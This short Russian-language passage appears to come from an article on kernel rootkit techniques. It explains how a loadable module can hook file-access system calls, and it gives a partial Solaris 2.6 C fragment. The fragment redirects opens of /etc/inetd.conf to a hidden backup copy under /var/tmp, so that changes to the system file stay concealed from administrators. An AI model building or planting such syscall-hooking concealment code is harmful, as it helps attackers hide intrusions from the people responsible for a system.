Введение модулей в ядро.
Модули могут перехватывать системные вызовы обращения к файлам, получения информации о системе и сознательно искажать получаемую информацию. Например, при открытии файла "/etc/inetd.conf" будет происходить открытие резервной копии этого файла спрятанной в системе. Таким образом скрывается изменение системных файлов. SYS_open:
SYS_open Solaris 2.6 ... static char new_path = "/var/tmp/.locks/.idx/inetd.conf"; int my_open(char *fname, int fmode, int cmode) { int rval;
rval = bcmp(fname, "/etc/inetd.conf", 16); if( rval) { return(copen(fname, (int)(fmode-FOPEN), cmode)); } else { return(copen(new_path, (int)(fmode-FOPEN), cmode)); } } ...
